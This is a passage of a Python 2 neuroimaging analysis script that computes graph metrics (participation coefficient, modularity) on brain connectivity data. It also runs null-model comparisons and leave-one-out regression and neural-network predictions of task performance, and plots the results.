				n_a_mod_pc_corr[i] = nan_pearsonr(n_a_subject_mods,n_a_subject_pcs[:,i])[0]
			n_a_mod_wmd_corr = np.zeros(n_a_subject_wmds.shape[1])
			for i in range(n_a_subject_wmds.shape[1]):
				n_a_mod_wmd_corr[i] = nan_pearsonr(n_a_subject_mods,n_a_subject_wmds[:,i])[0]
			print 'Pearson R, PC & Q, Mean PC: ', nan_pearsonr(n_a_mod_pc_corr,mean_pc)
			null_all_rs.append(nan_pearsonr(n_a_mod_pc_corr,mean_pc)[0])
			# print 'Pearson R, PC & WCD, Mean WMD: ', nan_pearsonr(mod_n_a_wmd_corr,mean_wmd)
		results = np.array([null_graph_rs,null_community_rs,null_all_rs])
		np.save('/home/despoB/mb3152/dynamic_mod/results/null_results.npy',results)
		# reference distribution from the real data, cached alongside the nulls
		real_df = connectivity_across_tasks(atlas='power',project='hcp',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='fz_wc',control_com=False,control_motion=False)
		real_df.to_csv('/home/despoB/mb3152/dynamic_mod/results/real_real_results.csv')
	# long-format dataframe for plotting: one R value per model draw
	df = pd.DataFrame(columns=['R','Null Model Type'])
	for r in null_graph_rs:
		df = df.append({'R':r,'Null Model Type':'Random Edges, Real Community'},ignore_index=True)
	for r in null_community_rs:
		df = df.append({'R':r,'Null Model Type':'Random Community, Real Edges'},ignore_index=True)
	for r in null_all_rs:
		df = df.append({'R':r,'Null Model Type':'Random Edges, Clustered'},ignore_index=True)
	for r in sm_null_results:
		df = df.append({'R':r,'Null Model Type':'Wattz-Strogatz'},ignore_index=True)
	for r in real_df.Result:
		# Result strings appear to be "r,p" pairs; keep only the r -- confirm format
		r = float(r.split(',')[0])
		df = df.append({'R':r,'Null Model Type':'Real Edges, Real Community'},ignore_index=True)
	# violin plot of the R distributions (sns.plt is the old seaborn pyplot alias)
	f = sns.plt.figure(figsize=(18,8))
	sns.set_style("white")
	sns.set_style("ticks")
	sns.set(context="paper",font='Helvetica',font_scale=1.75)
	sns.violinplot(x="Null Model Type", y="R", data=df,inner='quartile')
	sns.plt.ylabel("R Values Between Nodes' Mean Participation Coefficients\n and the R values of Participation Coefficients and Qs")
	sns.plt.tight_layout()
	sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/null_models.pdf')
def specificity():
	"""
	Specificity of modulation by nodes' PC.
	Does the PC value of i impact the connectivity of j as i and j are more strongly connected?
	"""
	# For each task and each hub definition (currently WCD only), split hub nodes
	# into Q+ / Q- drivers and test whether a driver's within-community modulation
	# of node j (minus between-community modulation) scales with the i-j edge weight.
	atlas = 'power'
	project='hcp'
	df_columns=['Task','Hub Measure','Q+/Q-','Average Edge i-j Weight',"Strength of r's, i's PC & j's Q"]
	tasks = ['REST','WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL',]
	known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
	df = pd.DataFrame(columns = df_columns)
	for task in tasks:
		print task
		# subjects = np.array(hcp_subjects).copy()
		# subjects = list(subjects)
		# subjects = remove_missing_subjects(subjects,task,atlas)
		subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %('hcp',task,atlas))
		static_results = graph_metrics(subjects,task,atlas,'fz')
		subject_pcs = static_results['subject_pcs']
		subject_wmds = static_results['subject_wmds']
		subject_mods = static_results['subject_mods']
		subject_wmds = static_results['subject_wmds'] # duplicate assignment (no-op)
		matrices = static_results['matrices']
		#sum of weight changes for each node, by each node.
		hub_nodes = ['WCD']
		# hub_nodes = ['PC']
		driver_nodes_list = ['Q+','Q-']
		# driver_nodes_list = ['Q+']
		mean_pc = np.nanmean(subject_pcs,axis=0)
		mean_wmd = np.nanmean(subject_wmds,axis=0)
		# per-node r between subjects' Q and their PC / WMD at that node
		mod_pc_corr = np.zeros(subject_pcs.shape[1])
		for i in range(subject_pcs.shape[1]):
			mod_pc_corr[i] = nan_pearsonr(subject_mods,subject_pcs[:,i])[0]
		mod_wmd_corr = np.zeros(subject_wmds.shape[1])
		for i in range(subject_wmds.shape[1]):
			mod_wmd_corr[i] = nan_pearsonr(subject_mods,subject_wmds[:,i])[0]
		for hub_node in hub_nodes:
			# pc_edge_corr[i, j, k]: correlation of node i's hub metric with edge j-k
			if hub_node == 'PC':
				pc_edge_corr = np.arctanh(pc_edge_correlation(subject_pcs,matrices,path='/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_pc_edge_corr_z.npy' %(project,task,atlas)))
				connector_nodes = np.where(mod_pc_corr>0.0)[0]
				local_nodes = np.where(mod_pc_corr<0.0)[0]
			else:
				pc_edge_corr = np.arctanh(pc_edge_correlation(subject_wmds,matrices,path='/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_wmd_edge_corr_z.npy' %(project,task,atlas)))
				connector_nodes = np.where(mod_wmd_corr>0.0)[0]
				local_nodes = np.where(mod_wmd_corr<0.0)[0]
			# mask out modulation values on below-median edges
			edge_thresh_val = 50.0
			edge_thresh = np.percentile(np.nanmean(matrices,axis=0),edge_thresh_val)
			pc_edge_corr[:,np.nanmean(matrices,axis=0)<edge_thresh] = np.nan
			for driver_nodes in driver_nodes_list:
				weight_change_matrix_between = np.zeros((num_nodes,num_nodes))
				weight_change_matrix_within = np.zeros((num_nodes,num_nodes))
				if driver_nodes == 'Q-':
					driver_nodes_array = local_nodes
				else:
					driver_nodes_array = connector_nodes
				# for each ordered (driver i, target j) pair, sum i's modulation of j's
				# edges split by whether the far node shares j's community (self excluded);
				# known_membership == 0 appears to mark unassigned nodes -- confirm.
				for n1,n2 in permutations(range(num_nodes),2):
					if n1 not in driver_nodes_array:
						continue
					if known_membership[n2] == 0:
						continue
					array = pc_edge_corr[n1][n2] # unused except by the commented block below
					weight_change_matrix_between[n1,n2] = np.nansum(pc_edge_corr[n1][n2][np.where((known_membership!=known_membership[n2])&(np.arange(264)!=n1))])
					weight_change_matrix_within[n1,n2] = np.nansum(pc_edge_corr[n1][n2][np.where((known_membership==known_membership[n2])&(np.arange(264)!=n1))])
					# for n3 in range(264):
					# 	if n1 == n3:
					# 		continue
					# 	if known_membership[n3]!= known_membership[n2]:
					# 		weight_change_matrix_between[n1,n2] = np.nansum([weight_change_matrix_between[n1,n2],array[n3]])
					# 		between_len = between_len + 1
					# 	else:
					# 		weight_change_matrix_within[n1,n2] = np.nansum([weight_change_matrix_within[n1,n2],array[n3]])
					# 		community_len = community_len + 1
					# weight_change_matrix_within[n1,n2] = weight_change_matrix_within[n1,n2] / community_len
					# weight_change_matrix_between[n1,n2] = weight_change_matrix_between[n1,n2] / between_len
				temp_matrix = np.nanmean(matrices,axis=0)
				# positive = i modulates j's within-community edges more than between
				weight_matrix = weight_change_matrix_within-weight_change_matrix_between
				weight_matrix[np.isnan(weight_matrix)] = 0.0
				if hub_node == 'PC':
					df_columns=['Task','Hub Measure','Q+/Q-','Average Edge i-j Weight',"Strength of r's, i's PC & j's Q"]
				else:
					df_columns=['Task','Hub Measure','Q+/Q-','Average Edge i-j Weight',"Strength of r's, i's WCD & j's Q"]
				df_array = []
				for i,j in zip(temp_matrix[weight_matrix!=0.0].reshape(-1),weight_matrix[weight_matrix!=0.0].reshape(-1)):
					df_array.append([task,hub_node,driver_nodes,i,j])
				df = pd.concat([df,pd.DataFrame(df_array,columns=df_columns)],axis=0)
				print hub_node, driver_nodes
				print pearsonr(weight_matrix[weight_matrix!=0.0].reshape(-1),temp_matrix[weight_matrix!=0.0].reshape(-1))
	# NOTE(review): deliberate hard stop (ZeroDivisionError) before the plotting
	# calls below, which are kept commented out for manual use -- confirm intent.
	1/0
	# plot_connectivity_results(df[(df['Q+/Q-']=='Q+') &(df['Hub Measure']=='PC')],"Strength of r's, i's PC & j's Q",'Average Edge i-j Weight','/home/despoB/mb3152/dynamic_mod/figures/edge_spec_pcqplus_%s.pdf'%(edge_thresh_val))
	# plot_connectivity_results(df[(df['Q+/Q-']=='Q-') &(df['Hub Measure']=='PC')],"Strength of r's, i's PC & j's Q",'Average Edge i-j Weight','/home/despoB/mb3152/dynamic_mod/figures/edge_spec_pcqminus_%s.pdf'%(edge_thresh_val))
	# plot_connectivity_results(df[(df['Q+/Q-']=='Q+') &(df['Hub Measure']=='WCD')],"Strength of r's, i's WCD & j's Q",'Average Edge i-j Weight','/home/despoB/mb3152/dynamic_mod/figures/edge_spec_wmdqplus_%s.pdf'%(edge_thresh_val))
	# plot_connectivity_results(df[(df['Q+/Q-']=='Q-') &(df['Hub Measure']=='WCD')],"Strength of r's, i's WCD & j's Q",'Average Edge i-j Weight','/home/despoB/mb3152/dynamic_mod/figures/edge_spec_wmdqminus_%s.pdf'%(edge_thresh_val))
	# """
	# Are connector nodes modulating the edges that are most variable across subjects?
	# """
	# atlas='power'
	# known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
	# for task in tasks:
	# 	pc_thresh = 75
	# 	local_thresh = 25
	# 	subjects = np.array(hcp_subjects).copy()
	# 	subjects = list(subjects)
	# 	subjects = remove_missing_subjects(subjects,task,atlas)
	# 	static_results = graph_metrics(subjects,task,atlas)
	# 	subject_pcs = static_results['subject_pcs']
	# 	subject_wmds = static_results['subject_wmds']
	# 	matrices = static_results['matrices']
	# 	matrices[:,np.nanmean(matrices,axis=0)<0.0] = np.nan
	# 	pc_edge_corr = np.arctanh(pc_edge_correlation(subject_wmds,matrices,path='/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_wmd_edge_corr_z.npy' %(project,task,atlas)))
	# 	# pc_edge_corr = pc_edge_correlation(subject_pcs,matrices,path='/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_pc_edge_corr_z.npy' %(project,task,atlas))
	# 	std_mod = []
	# 	tstd = np.std(matrices,axis=0).reshape(-1)
	# 	for i in range(num_nodes):
	# 		std_mod.append(nan_pearsonr(pc_edge_corr[i].reshape(-1),tstd)[0])
	# 	# print task, pearsonr(np.nanmean(subject_pcs,axis=0),std_mod)
	# 	print task, pearsonr(np.nanmean(subject_wmds,axis=0),std_mod)
	# 	plot_corr_matrix(np.std(matrices,axis=0),network_names.copy(),out_file=None,plot_corr=True,return_array=False)
def get_power_partition(atlas):
	"""Return the consensus community assignment for the Power 264-node atlas.

	Reads column 31 of Consensus264.csv (no header). The `atlas` argument is
	accepted for signature compatibility with sibling helpers but is ignored.
	"""
	consensus = pd.read_csv('/home/despoB/mb3152/modularity/Consensus264.csv',header=None)
	return np.array(consensus[31].values)
def predict(v):
	"""Leave-one-out linear-regression prediction for one held-out subject.

	v is a packed argument tuple (for pool.map): v[0] feature matrix,
	v[1] held-out index, v[2] performance vector. Fits on all other
	subjects and returns the prediction for the held-out one.
	"""
	features = v[0]
	held_out = v[1]
	performance = v[2]
	# boolean mask selecting every subject except the held-out one
	train_mask = np.ones(len(features)).astype(bool)
	train_mask[held_out] = False
	model = linear_model.LinearRegression(fit_intercept=True)
	model.fit(features[train_mask],performance[train_mask])
	return model.predict(features[held_out])
def sm_predict(v):
	"""Leave-one-out GLM prediction for one held-out subject (statsmodels).

	v is a packed argument tuple (for pool.map): v[0] feature matrix,
	v[1] held-out index, v[2] performance vector.

	Bug fix: the original fit the GLM and then executed a bare `return`,
	discarding the fitted model and always returning None. It now returns
	the held-out prediction, mirroring predict().
	"""
	pvals = v[0]
	t = v[1]
	task_perf = v[2]
	# boolean mask selecting every subject except the held-out one
	train = np.ones(len(pvals)).astype(bool)
	train[t] = False
	# add an intercept column before fitting/predicting
	pvals = sm.add_constant(pvals)
	r_perf = sm.GLM(task_perf[train],pvals[train]).fit()
	return r_perf.predict(pvals[t])
def corrfunc(x, y, **kws):
	"""Annotate the current axes with Pearson r and p for x vs y.

	Intended as a seaborn FacetGrid.map helper; extra keyword args
	(color, label, ...) are accepted and ignored.
	"""
	r, p = pearsonr(x, y)
	label = "r={:.3f},p={:.3f}".format(r, p)
	axes = plt.gca()
	axes.annotate(label, xy=(.1, .9), xycoords=axes.transAxes)
def tstatfunc(x, y, bc=False):
	"""Independent-samples t-test between x and y, formatted as a string.

	Without bc: returns "t=<t>,p=<p>" (t rounded to 3 dp, p to 5 dp).
	With bc (a Bonferroni comparison count): if the corrected p is <= 0.05,
	returns "t=...,p=...,bf=<corrected p>"; otherwise just "t=...".
	"""
	t_val, p_val = scipy.stats.ttest_ind(x, y)
	t_str = np.around(t_val, 3)
	p_str = np.around(p_val, 5)
	if bc == False:
		return "t=%s,p=%s" % (t_str, p_str)
	# Bonferroni-corrected p value
	corrected = np.around(p_val * bc, 5)
	if corrected <= 0.05:
		return "t=%s,p=%s,bf=%s" % (t_str, p_str, corrected)
	return "t=%s" % (t_str)
def plot_connectivity_results(data, x, y, save_str):
	"""Facetted regression plots of y vs x, one panel per Task, saved to save_str.

	Each panel gets its own scale, a regression scatter, and an r/p
	annotation from corrfunc.
	"""
	sns.set_style("white")
	sns.set_style("ticks")
	palette = np.array(sns.palettes.color_palette('Paired', 7))
	sns.set(context="paper", font='Helvetica', style="white", font_scale=1.5)
	with sns.plotting_context("paper", font_scale=1):
		grid = sns.FacetGrid(data, col='Task', hue='Task', sharex=False, sharey=False, palette=palette, col_wrap=4)
		grid.map(sns.regplot, x, y, scatter_kws={'alpha': .50})
		grid.map(corrfunc, x, y)
		sns.despine()
		plt.tight_layout()
		plt.savefig(save_str, dpi=3600)
		plt.close()
def plot_results(data, x, y, save_str):
	"""Facetted regression plots of y vs x (2-column layout), saved to save_str.

	Uses four colors from the 'Paired' palette (indices 0, 2, 4, 5) and
	annotates each panel with r/p via corrfunc.
	"""
	sns.set(context="paper", font='Helvetica', style="white", font_scale=1.5)
	palette = np.array(sns.palettes.color_palette('Paired', 6))
	with sns.plotting_context("paper", font_scale=1):
		grid = sns.FacetGrid(data, col='Task', hue='Task', sharex=False, sharey=False, palette=palette[[0, 2, 4, 5]], col_wrap=2)
		grid.map(sns.regplot, x, y, scatter_kws={'alpha': .95})
		grid.map(corrfunc, x, y)
		sns.despine()
		plt.tight_layout()
		plt.savefig(save_str, dpi=3600)
		plt.close()
def supplemental():
	"""Run the currently enabled supplemental control analyses and write each
	result table to disk.

	Only the motion-controlled variants are active; the original, scrubbed,
	and community-controlled runs are kept commented out for manual re-runs.
	Python 2 syntax (print statements).
	"""
	# print 'performance original'
	# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=False).to_csv('/home/despoB/mb3152/dynamic_mod/results/performance_orig.csv')
	# print 'performance scrubbed'
	# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='scrub_.2',control_com=False,control_motion=False).to_csv('/home/despoB/mb3152/dynamic_mod/results/performance_scrubbed.csv')
	print 'performance motion control'
	performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=True).to_csv('/home/despoB/mb3152/dynamic_mod/results/performance_motion_controlled.csv')
	# print 'performance community control'
	# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=True,control_motion=False).to_csv('/home/despoB/mb3152/dynamic_mod/results/performance_community_controlled.csv')
	# print 'correlations original'
	# motion_across_tasks(atlas='power',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='fz',control_com=False,control_motion=False).to_csv('/home/despoB/mb3152/dynamic_mod/results/correlations_original.csv')
	# print 'correlations scrubbed'
	# motion_across_tasks(atlas='power',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='scrub_.2',control_com=False,control_motion=False).to_csv('/home/despoB/mb3152/dynamic_mod/results/correlations_scrubbed.csv')
	print 'correlations motion control'
	# NOTE(review): this run uses connectivity_across_tasks while the commented
	# variants use motion_across_tasks -- confirm which is intended.
	connectivity_across_tasks(atlas='power',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='fz',control_com=False,control_motion=True).to_csv('/home/despoB/mb3152/dynamic_mod/results/correlations_motion_controlled.csv')
	# print 'correlations community control'
	# motion_across_tasks(atlas='power',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='fz',control_com=True,control_motion=False).to_csv('/home/despoB/mb3152/dynamic_mod/results/correlations_community_controlled.csv')
def print_supplemental():
	"""Run every supplemental control analysis variant, printing results only
	(no files written, unlike supplemental()). Python 2 syntax.
	"""
	print 'performance original'
	performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=False)
	print 'performance scrubbed'
	performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='scrub_.2',control_com=False,control_motion=False)
	print 'performance motion control'
	performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=True)
	print 'performance community control'
	performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=True,control_motion=False)
	print 'correlations original'
	motion_across_tasks(atlas='power',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='fz',control_com=False,control_motion=False)
	print 'correlations scrubbed'
	motion_across_tasks(atlas='power',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='scrub_.2',control_com=False,control_motion=False)
	print 'correlations motion control'
	motion_across_tasks(atlas='power',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='fz',control_com=False,control_motion=True)
	print 'correlations community control'
	motion_across_tasks(atlas='power',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='fz',control_com=True,control_motion=False)
def generate_correlation_map(x, y):
	"""Pearson-correlate each row of x with each row of y.

	Parameters
	----------
	x : np.array, shape N X T.
	y : np.array, shape M X T.

	Returns
	-------
	np.array, N X M array in which each element is a correlation coefficient.
	"""
	n_timepoints = x.shape[1]
	if y.shape[1] != n_timepoints:
		raise ValueError('x and y must have the same number of timepoints.')
	x_mean = x.mean(1)
	y_mean = y.mean(1)
	# ddof = n-1 leaves a divisor of (n - ddof) = 1, so std() here returns the
	# square root of the sum of squared deviations, not a true std.
	x_dev = x.std(1, ddof=n_timepoints - 1)
	y_dev = y.std(1, ddof=n_timepoints - 1)
	# cross-covariance (unnormalized): X.Y^T minus the mean-product term
	cross = np.dot(x, y.T) - n_timepoints * np.outer(x_mean, y_mean)
	return cross / np.outer(x_dev, y_dev)
def super_edge_predict_new(v):
	"""Leave-one-out MLP prediction of task performance for one held-out subject.

	v is a packed argument list (for pool.map):
	  v[0] subject_pcs, v[1] subject_wmds, v[2] subject_mods   (task scan)
	  v[3] rest_subject_pcs, v[4] rest_subject_wmds, v[5] rest_subject_mods (rest scan)
	  v[6] task_perf, v[7] t (held-out subject index),
	  v[8] task_matrices, v[9] rest_matrices,
	  v[10] return_features (also return the feature row), v[11] use_matrix
	Builds per-subject scalar features (each subject's similarity to the
	training-set performance/metric correlation maps), fits an MLP on all
	subjects except t, and returns the prediction for subject t.
	"""
	subject_pcs = v[0]
	subject_wmds = v[1]
	subject_mods = v[2]
	rest_subject_pcs = v[3]
	rest_subject_wmds = v[4]
	rest_subject_mods = v[5]
	task_perf = v[6]
	t = v[7]
	task_matrices = v[8]
	rest_matrices = v[9]
	return_features = v[10]
	use_matrix = v[11]
	# training mask: all subjects except the held-out one
	fit_mask = np.ones((subject_pcs.shape[0])).astype(bool)
	fit_mask[t] = False
	if use_matrix == True:
		# edge-wise features: correlate performance with each lower-triangle edge
		# (training subjects only), then score every subject's matrix against that map
		flat_matrices = np.zeros((subject_pcs.shape[0],len(np.tril_indices(264,-1)[0])))
		for s in range(subject_pcs.shape[0]):
			m = task_matrices[s]
			flat_matrices[s] = m[np.tril_indices(264,-1)]
		perf_edge_corr = generate_correlation_map(task_perf[fit_mask].reshape(1,-1),flat_matrices[fit_mask].transpose())[0]
		perf_edge_scores = np.zeros((subject_pcs.shape[0]))
		for s in range(subject_pcs.shape[0]):
			perf_edge_scores[s] = pearsonr(flat_matrices[s],perf_edge_corr)[0]
		# same edge scoring computed from the resting-state matrices
		flat_matrices = np.zeros((subject_pcs.shape[0],len(np.tril_indices(264,-1)[0])))
		for s in range(subject_pcs.shape[0]):
			m = rest_matrices[s]
			flat_matrices[s] = m[np.tril_indices(264,-1)]
		rest_perf_edge_corr = generate_correlation_map(task_perf[fit_mask].reshape(1,-1),flat_matrices[fit_mask].transpose())[0]
		rest_perf_edge_scores = np.zeros((subject_pcs.shape[0]))
		for s in range(subject_pcs.shape[0]):
			rest_perf_edge_scores[s] = pearsonr(flat_matrices[s],rest_perf_edge_corr)[0]
	# per-node r between training subjects' performance and task-scan PC / WMD
	perf_pc_corr = np.zeros(subject_pcs.shape[1])
	for i in range(subject_pcs.shape[1]):
		perf_pc_corr[i] = nan_pearsonr(task_perf[fit_mask],subject_pcs[fit_mask,i])[0]
	perf_wmd_corr = np.zeros(subject_wmds.shape[1])
	for i in range(subject_wmds.shape[1]):
		perf_wmd_corr[i] = nan_pearsonr(task_perf[fit_mask],subject_wmds[fit_mask,i])[0]
	# NOTE(review): despite the mod_* names, these correlate REST metrics with
	# task_perf (not with rest_subject_mods) -- confirm this is intended.
	mod_pc_corr = np.zeros(subject_pcs.shape[1])
	for i in range(subject_pcs.shape[1]):
		mod_pc_corr[i] = nan_pearsonr(task_perf[fit_mask],rest_subject_pcs[fit_mask,i])[0]
	mod_wmd_corr = np.zeros(subject_wmds.shape[1])
	for i in range(subject_wmds.shape[1]):
		mod_wmd_corr[i] = nan_pearsonr(task_perf[fit_mask],rest_subject_wmds[fit_mask,i])[0]
	# collapse each subject's nodal profile to its similarity with the group maps
	task_pc = np.zeros(subject_pcs.shape[0])
	task_wmd = np.zeros(subject_pcs.shape[0])
	for s in range(subject_pcs.shape[0]):
		task_pc[s] = nan_pearsonr(subject_pcs[s],perf_pc_corr)[0]
		task_wmd[s] = nan_pearsonr(subject_wmds[s],perf_wmd_corr)[0]
	rest_pc = np.zeros(subject_pcs.shape[0])
	rest_wmd = np.zeros(subject_pcs.shape[0])
	for s in range(subject_pcs.shape[0]):
		rest_pc[s] = nan_pearsonr(rest_subject_pcs[s],mod_pc_corr)[0]
		rest_wmd[s] = nan_pearsonr(rest_subject_wmds[s],mod_wmd_corr)[0]
	# assemble the feature matrix (subjects x features) and pick hidden layers
	if use_matrix == True:
		pvals = np.array([rest_pc,rest_wmd,task_pc,task_wmd,rest_perf_edge_scores,perf_edge_scores,rest_subject_mods,subject_mods]).transpose()
		# neurons = (8,8,8,)
		neurons = (8,12,8,12)
	elif use_matrix == False:
		pvals = np.array([rest_pc,rest_wmd,task_pc,task_wmd,rest_subject_mods,subject_mods]).transpose()
		# neurons = (6,6,6,)
		neurons = (6,9,6,9)
	train = np.ones(len(pvals)).astype(bool)
	train[t] = False
	# random_state=t makes each held-out fold deterministic
	model = MLPRegressor(solver='lbfgs',hidden_layer_sizes=neurons,alpha=1e-5,random_state=t)
	model.fit(pvals[train],task_perf[train])
	result = model.predict(pvals[t].reshape(1, -1))[0]
	if return_features == True:
		return pvals[t],result
	return result
def super_edge_predict(v):
	"""Older variant of super_edge_predict_new: leave-one-out MLP prediction.

	v is a packed argument list (for pool.map):
	  v[0] subject_pcs, v[1] subject_wmds, v[2] subject_mods   (task scan)
	  v[3] rest_subject_pcs, v[4] rest_subject_wmds, v[5] rest_subject_mods (rest scan)
	  v[6] task_perf, v[7] t (held-out index), v[8] neurons,
	  v[9] task_matrices, v[10] rest_matrices,
	  v[11] return_features, v[12] use_matrix
	Differences from the _new variant: edge features are computed
	unconditionally; rest edges are correlated with rest Q (not performance);
	return_features returns the feature row BEFORE fitting.
	"""
	subject_pcs = v[0]
	subject_wmds = v[1]
	subject_mods = v[2]
	rest_subject_pcs = v[3]
	rest_subject_wmds = v[4]
	rest_subject_mods = v[5]
	task_perf = v[6]
	t = v[7]
	# NOTE(review): neurons is read from v[8] here but unconditionally
	# overwritten below, so v[8] is effectively ignored -- confirm.
	neurons = v[8]
	task_matrices = v[9]
	rest_matrices = v[10]
	return_features = v[11]
	use_matrix = v[12]
	# training mask: all subjects except the held-out one
	fit_mask = np.ones((subject_pcs.shape[0])).astype(bool)
	fit_mask[t] = False
	# task edges: correlate performance with each lower-triangle edge (training
	# subjects only), then score every subject's matrix against that map
	flat_matrices = np.zeros((subject_pcs.shape[0],len(np.tril_indices(264,-1)[0])))
	for s in range(subject_pcs.shape[0]):
		m = task_matrices[s]
		flat_matrices[s] = m[np.tril_indices(264,-1)]
	perf_edge_corr = generate_correlation_map(task_perf[fit_mask].reshape(1,-1),flat_matrices[fit_mask].transpose())[0]
	perf_edge_scores = np.zeros((subject_pcs.shape[0]))
	for s in range(subject_pcs.shape[0]):
		perf_edge_scores[s] = pearsonr(flat_matrices[s],perf_edge_corr)[0]
	# rest edges: correlated with rest modularity (Q), not performance
	flat_matrices = np.zeros((subject_pcs.shape[0],len(np.tril_indices(264,-1)[0])))
	for s in range(subject_pcs.shape[0]):
		m = rest_matrices[s]
		flat_matrices[s] = m[np.tril_indices(264,-1)]
	mod_edge_corr = generate_correlation_map(rest_subject_mods[fit_mask].reshape(1,-1),flat_matrices[fit_mask].transpose())[0]
	mod_edge_scores = np.zeros((subject_pcs.shape[0]))
	for s in range(subject_pcs.shape[0]):
		mod_edge_scores[s] = pearsonr(flat_matrices[s],mod_edge_corr)[0]
	# per-node r between training subjects' performance and task-scan PC / WMD
	perf_pc_corr = np.zeros(subject_pcs.shape[1])
	for i in range(subject_pcs.shape[1]):
		perf_pc_corr[i] = nan_pearsonr(task_perf[fit_mask],subject_pcs[fit_mask,i])[0]
	perf_wmd_corr = np.zeros(subject_wmds.shape[1])
	for i in range(subject_wmds.shape[1]):
		perf_wmd_corr[i] = nan_pearsonr(task_perf[fit_mask],subject_wmds[fit_mask,i])[0]
	# NOTE(review): despite the mod_* names, these correlate REST metrics with
	# task_perf (not with rest_subject_mods) -- confirm this is intended.
	mod_pc_corr = np.zeros(subject_pcs.shape[1])
	for i in range(subject_pcs.shape[1]):
		mod_pc_corr[i] = nan_pearsonr(task_perf[fit_mask],rest_subject_pcs[fit_mask,i])[0]
	mod_wmd_corr = np.zeros(subject_wmds.shape[1])
	for i in range(subject_wmds.shape[1]):
		mod_wmd_corr[i] = nan_pearsonr(task_perf[fit_mask],rest_subject_wmds[fit_mask,i])[0]
	# collapse each subject's nodal profile to its similarity with the group maps
	task_pc = np.zeros(subject_pcs.shape[0])
	task_wmd = np.zeros(subject_pcs.shape[0])
	for s in range(subject_pcs.shape[0]):
		task_pc[s] = nan_pearsonr(subject_pcs[s],perf_pc_corr)[0]
		task_wmd[s] = nan_pearsonr(subject_wmds[s],perf_wmd_corr)[0]
	rest_pc = np.zeros(subject_pcs.shape[0])
	rest_wmd = np.zeros(subject_pcs.shape[0])
	for s in range(subject_pcs.shape[0]):
		rest_pc[s] = nan_pearsonr(rest_subject_pcs[s],mod_pc_corr)[0]
		rest_wmd[s] = nan_pearsonr(rest_subject_wmds[s],mod_wmd_corr)[0]
	# assemble the feature matrix (subjects x features); neurons chosen here
	if use_matrix == True:
		pvals = np.array([rest_pc,rest_wmd,task_pc,task_wmd,mod_edge_scores,perf_edge_scores]).transpose()
		neurons = (6,9,6,9,)
	elif use_matrix == False:
		pvals = np.array([rest_pc,rest_wmd,task_pc,task_wmd,]).transpose()
		neurons = (4,6,4,6,)
	train = np.ones(len(pvals)).astype(bool)
	train[t] = False
	if return_features == True:
		return pvals[t]
	# random_state=t makes each held-out fold deterministic
	model = MLPRegressor(solver='lbfgs',hidden_layer_sizes=neurons,alpha=1e-5,random_state=t)
	model.fit(pvals[train],task_perf[train])
	result = model.predict(pvals[t].reshape(1, -1))[0]
	return result
def task_performance(subjects, task):
	"""Return a numpy array of behavioral performance, one value per subject.

	Looks the requested task's score up in the S900 demographics table:
	WM accuracy, RELATIONAL accuracy, LANGUAGE max(story, math) difficulty,
	or SOCIAL mean(TOM, random) accuracy. Subjects without data get nan;
	subject 142626 is always set to nan.
	"""
	demo = pd.read_csv('/%s/dynamic_mod/S900_Release_Subjects_Demographics.csv'%(homedir))
	scores = []
	if task == 'WM':
		wm = pd.DataFrame(np.array([demo.Subject.values,demo['WM_Task_Acc'].values]).transpose(),columns=['Subject','ACC']).dropna()
		for subject in subjects:
			match = wm[wm.Subject==subject]
			if len(match) == 0:
				scores.append(np.nan)
				continue
			scores.append(match['ACC'].values[0])
	elif task == 'RELATIONAL':
		for subject in subjects:
			try:
				scores.append(demo['Relational_Task_Acc'][demo.Subject == subject].values[0])
			except:
				scores.append(np.nan)
	elif task == 'LANGUAGE':
		for subject in subjects:
			try:
				story = demo['Language_Task_Story_Avg_Difficulty_Level'][demo.Subject == subject].values[0]
				math_level = demo['Language_Task_Math_Avg_Difficulty_Level'][demo.Subject == subject].values[0]
				scores.append(np.nanmax([story,math_level]))
			except:
				scores.append(np.nan)
	elif task == 'SOCIAL':
		social = pd.DataFrame(np.array([demo.Subject,demo['Social_Task_TOM_Perc_TOM'],demo['Social_Task_Random_Perc_Random']]).transpose(),columns=['Subject','ACC_TOM','ACC_RANDOM']).dropna()
		for subject in subjects:
			match = social[social.Subject==subject]
			if len(match) == 0:
				scores.append(np.nan)
				continue
			scores.append(np.nanmean([match['ACC_RANDOM'].values[0],match['ACC_TOM'].values[0]]))
